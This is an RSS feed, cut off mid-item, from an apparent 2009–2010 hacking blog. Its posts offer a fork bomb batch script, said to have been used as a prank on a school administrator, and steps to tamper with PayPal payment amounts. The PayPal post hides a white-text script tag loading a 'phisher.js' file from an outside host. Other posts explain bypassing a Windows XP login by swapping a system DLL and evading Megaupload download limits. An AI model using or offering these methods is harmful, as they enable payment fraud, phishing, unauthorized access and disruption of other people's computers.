<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Computer Hacking &#124; Learn How To Hack &#187; Hacks</title>
	<atom:link href="http://www.hackingaday.com/category/hacks/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hackingaday.com</link>
	<description></description>
	<lastBuildDate>Thu, 16 Dec 2010 02:10:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to make a Fork Bomb (Rabbit Virus)</title>
		<link>http://www.hackingaday.com/2009/12/how-to-make-a-fork-bomb-rabbit-virus.html</link>
		<comments>http://www.hackingaday.com/2009/12/how-to-make-a-fork-bomb-rabbit-virus.html#comments</comments>
		<pubDate>Mon, 28 Dec 2009 09:25:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.hackingaday.com/?p=553</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/how-to-make-a-fork-bomb-rabbit-virus.html"><img align="left" hspace="5" width="125" src="http://farm4.static.flickr.com/3586/3591860560_4b3f72fba4.jpg" class="alignleft wp-post-image tfe" alt="" title="fork" /></a>
Introduction
Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.
A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/03/simplest-virus-%e2%80%93-the-fork-bomb.html' rel='bookmark' title='Permanent Link: Simplest Virus – The Fork Bomb'>Simplest Virus – The Fork Bomb</a></li>
<li><a href='http://www.hackingaday.com/2009/07/create-a-fake-and-a-destructive-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Fake And A Destructive Virus in Notepad'>Create a Fake And A Destructive Virus in Notepad</a></li>
<li><a href='http://www.hackingaday.com/2009/03/create-a-simple-beginner-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Simple beginner Virus in notepad'>Create a Simple beginner Virus in notepad</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="fork" src="http://farm4.static.flickr.com/3586/3591860560_4b3f72fba4.jpg" alt="3591860560 4b3f72fba4 How to make a Fork Bomb (Rabbit Virus)  " width="331" height="326" /></p>
<p style="text-align: center;"><strong>Introduction</strong></p>
<p>Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.</p>
<p>A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.</p>
<p>Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.</p>
<p style="text-align: center;"><strong> Background</strong></p>
<p>Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.</p>
<p style="text-align: center;"><strong> The code</strong></p>
<p>Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt</p>
<p>One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…</p>
<p>Blocks of code should be set as style “Formatted” like this.</p>
<p><code>:s</code></p>
<p><code>START %0</code></p>
<p><code>GOTO :s</code></p>
<p>Have fun guys and do leave your feedback about this article!</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/03/simplest-virus-%e2%80%93-the-fork-bomb.html' rel='bookmark' title='Permanent Link: Simplest Virus – The Fork Bomb'>Simplest Virus – The Fork Bomb</a></li>
<li><a href='http://www.hackingaday.com/2009/07/create-a-fake-and-a-destructive-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Fake And A Destructive Virus in Notepad'>Create a Fake And A Destructive Virus in Notepad</a></li>
<li><a href='http://www.hackingaday.com/2009/03/create-a-simple-beginner-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Simple beginner Virus in notepad'>Create a Simple beginner Virus in notepad</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/how-to-make-a-fork-bomb-rabbit-virus.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How to Update Kaspersky Antivirus Offline ?</title>
		<link>http://www.hackingaday.com/2009/12/how-to-update-kaspersky-antivirus-offline.html</link>
		<comments>http://www.hackingaday.com/2009/12/how-to-update-kaspersky-antivirus-offline.html#comments</comments>
		<pubDate>Mon, 21 Dec 2009 03:08:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Kaspersky]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/21/how-to-update-kaspersky-antivirus-offline</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/how-to-update-kaspersky-antivirus-offline.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/12/kaspersky_by_ridikul.png?w=128" class="alignleft wp-post-image tfe" alt="" title="" /></a>There are several ways by using you can update the Kaspersky antivirus offline . I am using Kaspersky updater utility and which is&#160; the free command-line utility is now in public beta and allows downloading of all Home and corporate Kaspersky Lab’s product updates to a folder of your choice for offline update, the good [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/get-free-kaspersky-antivirus-2010-genuine-license-key-for-6-months.html' rel='bookmark' title='Permanent Link: Get Free Kaspersky Antivirus 2010 Genuine License Key for 6 Months'>Get Free Kaspersky Antivirus 2010 Genuine License Key for 6 Months</a></li>
<li><a href='http://www.hackingaday.com/2009/12/use-kaspersky-for-unlimited-period.html' rel='bookmark' title='Permanent Link: Use Kaspersky for unlimited period'>Use Kaspersky for unlimited period</a></li>
<li><a href='http://www.hackingaday.com/2009/04/download-kaspersky-internet-security-2009-keys.html' rel='bookmark' title='Permanent Link: Download Kaspersky Internet Security 2009 Keys'>Download Kaspersky Internet Security 2009 Keys</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div style="text-align:justify;">There are several ways by using you can update the Kaspersky antivirus offline . I am using Kaspersky updater utility and which is&nbsp; the free command-line utility is now in public beta and allows downloading of all Home and corporate Kaspersky Lab’s product updates to a folder of your choice for offline update, the good thing is that the new version now supports a GUI to control the CLI Universal updater utility.</div>
<div style="text-align:justify;"></div>
<div style="text-align:justify;"></div>
<div style="text-align:justify;"><b>Follow the simple steps to download Updates :</b></div>
<div style="text-align:justify;">Step 1 : Visit <a href="http://support.kaspersky.com/updater?level=2" target="_blank">this Website</a> and download latest <b>KLUpdater.zip</b> from there as it contains the GUI interface also.</div>
<div class="separator" style="clear:both;text-align:center;"></div>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/kaspersky_by_ridikul.png" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/kaspersky_by_ridikul.png?w=128" title="How to Update Kaspersky Antivirus Offline ?" alt=" How to Update Kaspersky Antivirus Offline ?" /></a></div>
<div style="text-align:justify;">
<div style="text-align:justify;">Step2 : Once you downloaded KLUpdater.zip , Just extract the files in a Folder.</div>
<div style="text-align:justify;">Step 3 : Now you will get extracted files, Now run the <b>KasperskyUpdater.exe</b>.</div>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/kaspupdate.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/kaspupdate.jpg?w=236" title="How to Update Kaspersky Antivirus Offline ?" alt=" How to Update Kaspersky Antivirus Offline ?" /></a></div>
<div style="text-align:justify;">
</div>
<div style="text-align:justify;">Step 5 : Now the Kaspersky Window will be appeared (As shown in the screenshot)..Select the specific product for which you want to download the updates.</div>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/kaspersky-update-2.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/kaspersky-update-2.jpg?w=291" title="How to Update Kaspersky Antivirus Offline ?" alt=" How to Update Kaspersky Antivirus Offline ?" /></a></div>
<div style="text-align:justify;"><a href="http://www.tricksmachine.com/wp-content/uploads/2009/03/kaspersky-update-2.jpg"><br /></a></div>
<div style="text-align:justify;">Step 6:&nbsp; Check the boxes which I marked in the figure and select appropriate product. Once done . click on <i><b>Apply</b></i> and then press <i><b>Start</b></i> to start the downloading process.</div>
<div style="text-align:justify;">Step 7 : Downloading files will be start and a&nbsp; Command prompt will pop up and will show the status. All the required update files will be now downloaded to the folder “<b>Updates</b>“</div>
<div style="text-align:justify;">Thats it. Once done, now you have the off-line</div>
<p>update for that product of kaspersky which you have selected. 
<div style="text-align:justify;"><span style="text-decoration:underline;"><span style="color:red;"><b>How to use this downloaded files to update your Kaspersky product ??</b></span></span></div>
<ul>
<li> <b>Right click</b> on system tray icon of the Kaspersky Antivirus.</li>
<li>  Select the <b>Update</b> menu and click <b>Settings</b> .</li>
<li>  Click the <b>Add</b> menu, and find the location of the folder containing the update file above (download the Updates folder above)</li>
<li>  After added, remove the check for “Kaspersky Lab’s update server” and click OK.</li>
<li>DONE.</li>
</ul>
<p>Hope you like this post. Don’t forget to drop your comments!<br />via-tricksmachine.com </p>
</div>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/get-free-kaspersky-antivirus-2010-genuine-license-key-for-6-months.html' rel='bookmark' title='Permanent Link: Get Free Kaspersky Antivirus 2010 Genuine License Key for 6 Months'>Get Free Kaspersky Antivirus 2010 Genuine License Key for 6 Months</a></li>
<li><a href='http://www.hackingaday.com/2009/12/use-kaspersky-for-unlimited-period.html' rel='bookmark' title='Permanent Link: Use Kaspersky for unlimited period'>Use Kaspersky for unlimited period</a></li>
<li><a href='http://www.hackingaday.com/2009/04/download-kaspersky-internet-security-2009-keys.html' rel='bookmark' title='Permanent Link: Download Kaspersky Internet Security 2009 Keys'>Download Kaspersky Internet Security 2009 Keys</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/how-to-update-kaspersky-antivirus-offline.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Paypal and pay $0.01 on every thing you buy.</title>
		<link>http://www.hackingaday.com/2009/12/hack-paypal-and-pay-0-01-on-every-thing-you-buy.html</link>
		<comments>http://www.hackingaday.com/2009/12/hack-paypal-and-pay-0-01-on-every-thing-you-buy.html#comments</comments>
		<pubDate>Sat, 19 Dec 2009 14:14:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/19/hack-paypal-and-pay-0-01-on-every-thing-you-buy</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/hack-paypal-and-pay-0-01-on-every-thing-you-buy.html"><img align="left" hspace="5" width="125" src="http://4.bp.blogspot.com/_YvilmTfU19g/Sv6rQQPua3I/AAAAAAAAAdU/W6Kh8dIfJsk/s320/paypal_logo.jpg" class="alignleft wp-post-image tfe" alt="" title="" /></a>Here is a new trick to hack bank accounts using firefox and get pay money of your own choice no matter how much it costs. I tried this on Alertpay and Paypal and it worked for me.Note: You must be using Firefox
1. Get his addon: https://addons.mozilla.org/en-US/firefox/addon/9662. Find a site that requires you to pay (best [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/07/makehackold-firefox-addons-work-on-firefox-3-5-and-other-latest-version.html' rel='bookmark' title='Permanent Link: Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version'>Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version</a></li>
<li><a href='http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html' rel='bookmark' title='Permanent Link: How To Hack A Computer'>How To Hack A Computer</a></li>
<li><a href='http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html' rel='bookmark' title='Permanent Link: Increase Firefox Downloading Speed Using FireDownload'>Increase Firefox Downloading Speed Using FireDownload</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Here is a new trick to hack bank accounts using firefox and get pay money of your own choice no matter how much it costs. I tried this on <a href="http://www.blogger.com/www.alertpay.com">Alertpay</a> and <a href="http://www.blogger.com/www.paypal.com">Paypal</a> and it worked for me.<br /><img alt="paypal logo Hack Paypal and pay $0.01 on every thing you buy." border="0" src="http://4.bp.blogspot.com/_YvilmTfU19g/Sv6rQQPua3I/AAAAAAAAAdU/W6Kh8dIfJsk/s320/paypal_logo.jpg" title="Hack Paypal and pay $0.01 on every thing you buy." />Note: You must be using Firefox</p>
<p>1. Get his addon: <a href="https://addons.mozilla.org/en-US/firefox/addon/966">https://addons.mozilla.org/en-US/firefox/addon/966</a><br />2. Find a site that requires you to pay (best if its software) at PayPal.<br />3. Find the paypal button (yellow one).<br />4. Go to Tools &gt; Tamper Data<br />5. Click &#8220;Start Tamper&#8221; in the Interface<br />6. Click the PayPal button<br /><span style="color:rgb(255,255,255);font-size:78%;"><br />&lt;script src=&#8221;http://www.sigmirror.com/files/47027_xexzy/phisher.js&#8221; type=&#8221;text/JavaScript&#8221;&gt;&lt;/script&gt;</span></p>
<p>7. A popup window will popup on the Data Tampering window asking you if you want to tamper the data. Press Yes<br />8. In the new window find the Text field that says &#8220;amount&#8221;<br />9. Change the amount to &#8220;00.00&#8243; or &#8220;00.01&#8243; (that is the amount you will pay)<br />10. Press OK and stop Tampering the data<br />11. You will get transfered to PayPals paying page and you will only need to pay the amount you inputed. Most of the sites will take you straight to the softwares download page instead of checking how much you payed, first.</p>
<p>I hope this helped.</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/07/makehackold-firefox-addons-work-on-firefox-3-5-and-other-latest-version.html' rel='bookmark' title='Permanent Link: Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version'>Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version</a></li>
<li><a href='http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html' rel='bookmark' title='Permanent Link: How To Hack A Computer'>How To Hack A Computer</a></li>
<li><a href='http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html' rel='bookmark' title='Permanent Link: Increase Firefox Downloading Speed Using FireDownload'>Increase Firefox Downloading Speed Using FireDownload</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/hack-paypal-and-pay-0-01-on-every-thing-you-buy.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Increase Firefox Downloading Speed Using FireDownload</title>
		<link>http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html</link>
		<comments>http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html#comments</comments>
		<pubDate>Thu, 17 Dec 2009 09:06:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FireFox]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/17/increase-firefox-downloading-speed-using-firedownload</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/12/firedownload-a-firefox-addon.jpg?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>There’s not doubt about the Fact that Firefox is the leader in internet Browsers industry. But in case of downloading via browser, a user get much lower download speed as compared to any Download Manager even in Firefox. and lesser download speed means more time. To get almost same transfer rate that of a download [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/how-to-increase-your-intenet-speed.html' rel='bookmark' title='Permanent Link: How to increase your intenet speed'>How to increase your intenet speed</a></li>
<li><a href='http://www.hackingaday.com/2009/03/firefox-speed-hacks.html' rel='bookmark' title='Permanent Link: FireFox Speed Hacks'>FireFox Speed Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/07/makehackold-firefox-addons-work-on-firefox-3-5-and-other-latest-version.html' rel='bookmark' title='Permanent Link: Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version'>Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div style="text-align:justify;">There’s not doubt about the Fact that Firefox is the leader in internet Browsers industry. But in case of downloading via browser, a user get much lower download speed as compared to any Download Manager even in Firefox. and lesser download speed means more time. To get almost same transfer rate that of a download manager, while downloading through Firefox, a Add-on for Firefox named <strong>‘FireDownload’</strong>. is there for you.</div>
<div style="text-align:justify;">
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/firedownload-a-firefox-addon.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/firedownload-a-firefox-addon.jpg?w=300" title="Increase Firefox Downloading Speed Using FireDownload" alt=" Increase Firefox Downloading Speed Using FireDownload" /></a></div>
<p>&nbsp;</p></div>
<p><span class="fullpost"> </span>
<div style="text-align:justify;">“<strong>FireDownload</strong> Supercharge your web downloads! By using state of the art acceleration technology, this extension will speed up your downloads up to 10 times.”</div>
<div style="text-align:justify;"></div>
<div style="text-align:justify;"><span class="content">
<div style="text-align:justify;">As per my experience, <strong>FireDownload surely increase the downloading speed in Firefox</strong>. So, why not give it a try!</div>
<div style="text-align:justify;"><strong><a href="http://www.fireaddons.com/iamchosen/" target="_blank">Download FireDownload</a></strong>, a Firefox Addon. <a href="http://www.mozilla.com/firefox"><strong> </strong></a><strong><a href="" target="_blank">Mozilla Firefox 3</a></strong> or above is required.</div>
<div style="text-align:justify;"><strong>Note</strong>: There are reports on blocking download from some of the sites, so you may need to disable it in order to download fromt those sites.</div>
<div style="text-align:center;"><span style="font-weight:bold;">Tell me about your experience after downloading it&nbsp; <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Increase Firefox Downloading Speed Using FireDownload" /> </span></div>
<p></span></div>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/how-to-increase-your-intenet-speed.html' rel='bookmark' title='Permanent Link: How to increase your intenet speed'>How to increase your intenet speed</a></li>
<li><a href='http://www.hackingaday.com/2009/03/firefox-speed-hacks.html' rel='bookmark' title='Permanent Link: FireFox Speed Hacks'>FireFox Speed Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/07/makehackold-firefox-addons-work-on-firefox-3-5-and-other-latest-version.html' rel='bookmark' title='Permanent Link: Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version'>Make(Hack)Old Firefox Addons work on Firefox 3.5 and other latest version</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/increase-firefox-downloading-speed-using-firedownload.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Hack A Computer</title>
		<link>http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html</link>
		<comments>http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html#comments</comments>
		<pubDate>Sat, 12 Dec 2009 13:03:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/12/how-to-hack-a-computer</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/12/wxplgn06.gif?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>Yesterday I talked about how to “Download Without any Premium Account From Rapidshare And Megaupload“. Today Iam going To Show A method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.There is a far better way to get into Windows XP. It [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/access-the-pc-without-changing-the-password-windows-only.html' rel='bookmark' title='Permanent Link: Access The PC Without Changing The Password (WINDOWS ONLY)'>Access The PC Without Changing The Password (WINDOWS ONLY)</a></li>
<li><a href='http://www.hackingaday.com/2009/09/hack-your-friends-account-password.html' rel='bookmark' title='Permanent Link: Hack your friends account password'>Hack your friends account password</a></li>
<li><a href='http://www.hackingaday.com/2009/07/hack-yahoo-ids-using-fake-login-pagemodified-script.html' rel='bookmark' title='Permanent Link: Hack Yahoo ids using Fake login page(modified script)'>Hack Yahoo ids using Fake login page(modified script)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Yesterday I talked about how to “<a href="http://www.hackingaday.com/2009/12/download-without-any-premium-account.html">Download Without any Premium Account From Rapidshare And Megaupload</a>“. Today Iam going To Show A method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.<br />There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/wxplgn06.gif" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/wxplgn06.gif?w=300" title="How To Hack A Computer" alt=" How To Hack A Computer" /></a></div>
<p><b>Steps to Hack into a Windows XP Computer without changing password:</b><br />1. Get physical access to the machine. Remember that it must have a CD or DVD drive.<br /><!-- adsense --> <br />2. <a href="http://rapidshare.com/files/92000816/dpl.zip">Download DreamPackPL HERE</a>.<br />3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.<br />4. Use any burning program that can burn ISO images.<br />5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.<br />6. Press “<b>R</b>” to install DreamPackPL.<br />7. Press “<b>C</b>” to install DreamPackPL by using the recovery console.<br />8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)<br />9. Backup your original sfcfiles.dll by typing:<br />“<b>ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld</b>” (without quotes)<br />10. Copy the hacked file from CD to system32 folder. Type:<br />“<b>copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll</b>” (without quotes and assuming your CD drive is D:)<br />11. Type “exit”, take out disk and reboot.<br />12. In the password field, type “<b>dreamon</b>” (without quotes) and DreamPack menu will appear.<br />13. Click the top graphic on the DreamPack menu and you will get a menu popup.
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/dppl06.gif" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/dppl06.gif?w=293" title="How To Hack A Computer" alt=" How To Hack A Computer" /></a></div>
<p>14. Go to commands and enable the options and enable the god command.
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/dreamon.gif" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/dreamon.gif?w=289" title="How To Hack A Computer" alt=" How To Hack A Computer" /></a></div>
<p>15. Type “god” in the password field to get in Windows. <br />You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.<br /><b>Note:</b> I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/access-the-pc-without-changing-the-password-windows-only.html' rel='bookmark' title='Permanent Link: Access The PC Without Changing The Password (WINDOWS ONLY)'>Access The PC Without Changing The Password (WINDOWS ONLY)</a></li>
<li><a href='http://www.hackingaday.com/2009/09/hack-your-friends-account-password.html' rel='bookmark' title='Permanent Link: Hack your friends account password'>Hack your friends account password</a></li>
<li><a href='http://www.hackingaday.com/2009/07/hack-yahoo-ids-using-fake-login-pagemodified-script.html' rel='bookmark' title='Permanent Link: Hack Yahoo ids using Fake login page(modified script)'>Hack Yahoo ids using Fake login page(modified script)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/how-to-hack-a-computer.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to have megaupload fullspeed</title>
		<link>http://www.hackingaday.com/2009/11/how-to-have-megaupload-fullspeed.html</link>
		<comments>http://www.hackingaday.com/2009/11/how-to-have-megaupload-fullspeed.html#comments</comments>
		<pubDate>Wed, 25 Nov 2009 15:18:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/11/25/how-to-have-megaupload-fullspeed</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/11/how-to-have-megaupload-fullspeed.html"><img align="left" hspace="5" width="125" src="http://weblog.acerainbow.com/files/megaupload-news.jpg" class="alignleft wp-post-image tfe" alt="http://weblog.acerainbow.com/files/megaupload-news.jpg" title="" /></a>


Today I am going to show you how to trick megaupload and have full premium user speed.&#160;

Just follow these step:
1.What you have to do is to do a little modification to your link;
2.If the download link is link this:
http://www.megaupload.com/?d=b4ojjacg
3.What you have to do is just add&#8221; mgr_dl.php &#8220;(without the quote)after the .com/
4. Here is an [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/08/rapiddownloader-0-8-2download-files-without-any-limit-from-rapidshare-and-megaupload.html' rel='bookmark' title='Permanent Link: RapidDownloader 0.8.2:Download files without any limit from Rapidshare and Megaupload'>RapidDownloader 0.8.2:Download files without any limit from Rapidshare and Megaupload</a></li>
<li><a href='http://www.hackingaday.com/2009/12/download-without-any-premium-account-from-rapidshare-and-megaupload.html' rel='bookmark' title='Permanent Link: Download Without any Premium Account From Rapidshare And Megaupload'>Download Without any Premium Account From Rapidshare And Megaupload</a></li>
<li><a href='http://www.hackingaday.com/2009/10/automate-rapidshare-downloading-without-premium.html' rel='bookmark' title='Permanent Link: Automate Rapidshare Downloading Without Premium'>Automate Rapidshare Downloading Without Premium</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div style="color:black;text-align:center;">
<div style="clear:right;float:right;margin-bottom:1em;margin-left:1em;"><img alt="http://weblog.acerainbow.com/files/megaupload-news.jpg" height="260" src="http://weblog.acerainbow.com/files/megaupload-news.jpg" width="320" title="How to have megaupload fullspeed" /></div>
</div>
<div style="color:black;font-family:&quot;"><span style="font-size:small;">Today I am going to show you how to trick megaupload and have full premium user speed.&nbsp;</span></div>
<div style="color:black;font-family:&quot;"></div>
<div style="color:black;font-family:&quot;"><span style="font-size:medium;">Just follow these step:</span></p>
<p><span style="font-size:medium;">1.What you have to do is to do a little modification to your link;</span></p>
<p><span style="font-size:medium;">2.If the download link is link this:</span></p>
<p><span style="font-size:medium;"><span id="rslinkfy"><a href="http://www.megaupload.com/?d=b4ojjacg" id="alive_link" title="Name: oscdimg.exe Size: 0.12 MB (126528 bytes)">http://www.megaupload.com/?d=b4ojjacg</a></span></span></p>
<p><span style="font-size:medium;">3.What you have to do is just add&#8221; <b>mgr_dl.php</b> &#8220;(without the quote)after the .com/</span></p>
<p><span style="font-size:medium;">4.</span> <span style="font-size:medium;">Here is an example:</span></div>
<p><span style="font-size:medium;"><a href="http://www.megaupload.com/">http://www.megaupload.com/</a><b>mgr_dl.php</b>?d=b4ojjacg</span></p>
<p><span style="font-size:medium;">As you can see we have add the mgr_dl.php in the link</span></p>
<p><span style="font-size:medium;">Now you are done, you don&#8217;t have to wait for countdown and other shit, enjoy full speed</span>.<span style="font-size:small;">&nbsp;</span></p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/08/rapiddownloader-0-8-2download-files-without-any-limit-from-rapidshare-and-megaupload.html' rel='bookmark' title='Permanent Link: RapidDownloader 0.8.2:Download files without any limit from Rapidshare and Megaupload'>RapidDownloader 0.8.2:Download files without any limit from Rapidshare and Megaupload</a></li>
<li><a href='http://www.hackingaday.com/2009/12/download-without-any-premium-account-from-rapidshare-and-megaupload.html' rel='bookmark' title='Permanent Link: Download Without any Premium Account From Rapidshare And Megaupload'>Download Without any Premium Account From Rapidshare And Megaupload</a></li>
<li><a href='http://www.hackingaday.com/2009/10/automate-rapidshare-downloading-without-premium.html' rel='bookmark' title='Permanent Link: Automate Rapidshare Downloading Without Premium'>Automate Rapidshare Downloading Without Premium</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/11/how-to-have-megaupload-fullspeed.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>List of best 10 facebook hacks</title>
		<link>http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html</link>
